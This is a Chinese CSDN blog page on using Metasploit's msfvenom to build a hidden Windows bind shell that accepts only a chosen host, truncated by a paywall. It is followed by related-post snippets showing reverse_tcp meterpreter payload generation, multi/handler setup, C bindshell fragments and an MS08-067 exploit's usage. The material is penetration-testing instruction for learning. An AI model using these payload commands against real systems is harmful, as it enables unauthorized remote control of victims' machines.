Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell

最新推荐文章于 2023-07-06 17:43:33 发布
最新推荐文章于 2023-07-06 17:43:33 发布
阅读量347 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40602516/article/details/115015283
版权

在内网渗透中,正向 bind shell 会经常用到,正反向shell:反向 reverse shell 就是通过我们监听,目标肉鸡运行 exe 我们就会收到一个反弹 shell;而正向就是目标肉鸡运行 exe,我们去连接肉鸡。

 

首先通过 MSF 生成一个正向 shell:

msfvenom -p windows/shell_hidden_bind_tcp LPORT=8889 AHOST=192.168.84.128 -f exe > bind_shell.exe

使用python3开启一个自带的http服务器:

再在肉鸡访问hacker的8000端口将exe下载后运行:

最低0.47元/天 解锁文章
不想当脚本小子的脚本小子
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解
代码审计
04-22 2241
抽离 专职生成对应的payload异或编码 -e x86/shikata_ga_nai -i 3linux 生成 payloadphp 生成 payloadpython 生成 payloadwindows 生产payload 抽离 专职生成对应的payload 异或 编码 免杀 msfvenom -l platforms 支持平台 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f
【渗透测试笔记】之【MSF 生成payload】
AA8j的博客
11-07 746
生成payload # 查看所有payloads show payloads # 查看windows可用(输完按两下回车) use payload/windows/ # 使用绑定端口payload msf5 > use payload/windows/shell_bind_tcp # 查看payload编码,里面可能含有“坏字符” msf5 payload(windows/shell_bind_tcp) > generate # 对坏字符编码(默认自动选择一个最合适的encoder,也可以手动指
3.7 bindshell编写
qq_55202378的博客
08-22 539
bindshell
6-18漏洞利用-后门连接
山兔的博客
07-25 798
我们一定要检测,当前系统,开放了那些端口,在某些情况下,尽量没有使用的端口,尽量关闭,我们只开启,我们服务器运行状态下,必须要开启的端口号,不相关的端口号,直接关闭,当然,我们也要实时监测系统服务器的网络状态,在出现连接过程中,我们一定要注意很有可能,这就是一次连接后门程序的一个活动,我们要对它进行实时监控。我们根据bindshell,猜测到,会是一个后门程序,这个时候,我们就需要验证这个猜测,我们用nc连接目标地址的端口号,来对其后门进行连接,从而获取对应的权限。我们服务器为什么存在后门程序。...
Bindshell原理
weixin_33752045的博客
06-05 1210
原理很简单就是创建一个进程打开一个终端然后标准输入输出句柄重定位到一个网络端口c版 win系统 #include<winsock2.h> #pragma comment(lib,"Ws2_32.lib") int _tmain(int argc, TCHAR* argv[]) { //1.初始化一个sock服务 WSADATA stWSA; WSAStartup...
metasploit
03-16
这可以是反向shell,使得攻击者的机器接收来自目标系统的连接,或者绑定shell目标系统等待攻击者的连接。Shell提供了对目标系统的直接操作权限,允许执行任意命令。 5. **Meterpreter** Meterpreter是Metasploit...
Metasploit渗透测试指南(全) .pdf
12-23
本书会讲解各种payload类型,如shellcode、bind shell、reverse shell等,以及如何根据目标环境选择合适的payload。同时,还会涉及编码器的使用,以避开防火墙和反病毒软件的检测。 此外,书中的高级话题可能涵盖...
ShellPop:像高手一样弹奏贝壳
02-05
ShellPop 关于 Shellpop就是关于弹出shell的。...root@kali# apt-get install python-argcomplete metasploit-framework -y root@kali# pip install -r requirements.txt 安装安装 root@kali# python setup.py install
metasploit中文使用指南
08-18
Meterpreter是一种动态的、功能丰富的远程控制工具,它允许目标系统上执行各种操作,包括但不限于文件管理、进程控制、键盘记录、屏幕截取等。Meterpreter会话可以通过`use post`命令切换到不同的后渗透模块。 五...
ms08-067溢出漏洞
07-01
MS08-06最新利用工具WSS白细胞发布 溢出后开启对方的4444端口 经过测试从XP到2000、2003、Vista都可以拿下权限 对方机器要有TCP139或TCP445端口 C:\>ms08067.exe MS08-067 Remote Stack Overflow Vulnerability Exploit(POC) Create by Whitecell's Polymorphours@whitecell.org 2008/10/27 Thanks isno and PolyMeta ShellCode Function: bindshell port:4444 usage: ms08067.exe [IP] 攻击之后,正向连接对方的TCP4444端口即可。
第一百二十四课:解决无meterpreter shell添加虚拟路由映射第一季1
08-03
6.Reverse Shell:Reverse Shell 是一种特殊的 Shell 连接方式,攻击者可以通过 Reverse Shell 连接到目标机上,获得控制权。在本资源中,使用 Reverse Shell 连接到目标机上,实现攻击目的。 7. Virtual Route ...
Shell内建命令之bind
荣耀之路
03-13 1080
Shell内建命令之bind
linux漏洞Bind Shell Backdoor Detection
arissa666的博客
07-06 205
Bind Shell Backdoor Detection利用。telnet 主机地址 1524。
Metasploit 快速入门(三)—— 服务端漏洞利用
gclome的博客
07-22 2552
今天的这篇文章是对Metasploit 快速入门(三)—— 服务端漏洞利用这篇文章的复现。有些地方由于环境配不好,就直接把原文的图copy过来了! 温馨提示:靶机用自己的虚拟机就好,如果不想搞坏你的虚拟机,记得加快照、加快照、快照 原创:合天网安实验室合天智汇 在前面,我们学习了 Metasploit快速入门(一) Metasploit快速入门(二) Metasploit 快速入门(二)——信息收集和扫描-续 在本章中,我们将学习以下内容 1、攻击Linux服务器 2、SQL注入攻击 3、shell类型
远控免杀学习笔记-msfvenom工具介绍(二)
m0_49025459的博客
04-06 534
windows下⽣成32位/64位payload时需要注意:以windows/meterpreter/reverse_tcp为例,该payload默认为32位,也可使⽤-a x86选项指定。⼀般来说使⽤msfvenom⽣成的payload会单独开启⼀个进程,这种进程很容易被发现和关闭,在后期想做持久化的时候只能再使⽤ migrate,其实在⽣成payload时可直接使⽤如下命令,⽣成的payload会直接注⼊到指定进程中。jobs -K 可结束所有任务。
msf反弹shell
cj_Hydra's Blog
02-01 1463
windows+exe反弹 使用msfvenom模块生成一个被控端的客户端文件,这里用windows 64为例(如果不加x64,则默认是32位),此时就会生成一个shell.exe的程序。 msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=攻击机ip地址 lport=监听端口 -f exe >shell.exe 在攻击机的m...
ARM exploit编写二
Yale的博客
02-03 297
学习如何编写实现bind shell和reverse shellshellcode。 首先我们要理解一些技术细节。 先来看看什么是bind shell以及它是如何工作的。通过bind shell你可以在目标机器上打开一个通信端口或者监听器。监听器会等待到来的连接,你连上去后,监听器会接收连接然后给你弹回一个shell.(其实就是我们所说的正向连接) 在看看Revese shell,通过reve...
shellcode中变形bindshell的实现
whatday的专栏
09-28 860
最近学习《0day安全》一书 记录一下调试编码过程 书中环境XP VC6 本机的环境是server 2008 r2 x64  编译环境是vs2013    第一步: 首先是写一个win c版本的bindshell 代码如下: #include&lt;winsock2.h&gt; #pragma comment(lib,"Ws2_32.lib") void main() { //1...
metasploit 反弹shell
最新发布
10-16
Metasploit 是一款常用的渗透测试工具,可以用来测试网络安全。反弹 shellMetasploit 中的一个常用功能,可以通过它在目标机器上执行命令或者获取目标机器的控制权。具体操作步骤如下: 1. 打开 Metasploit 控制台,输入以下命令: ``` use exploit/multi/handler set PAYLOAD <payload> set LHOST <attacker IP> set LPORT <attacker port> run ``` 其中,`<payload>` 是要使用的 payload,常用的有 `windows/meterpreter/reverse_tcp`、`linux/x86/meterpreter/reverse_tcp` 等;`<attacker IP>` 是攻击者的 IP 地址;`<attacker port>` 是攻击者监听的端口号。 2. 在目标机器上执行以下命令: ``` msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> > shell.<format> ``` 其中,`<payload>`、`<attacker IP>`、`<attacker port>` 与上面的命令相同;`<format>` 是输出格式,常用的有 `exe`、`elf`、`asp` 等。 3. 将生成的 shell 文件上传到目标机器上,并执行以下命令: ``` ./shell.<format> ``` 4. 回到 Metasploit 控制台,可以看到已经成功反弹shell

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值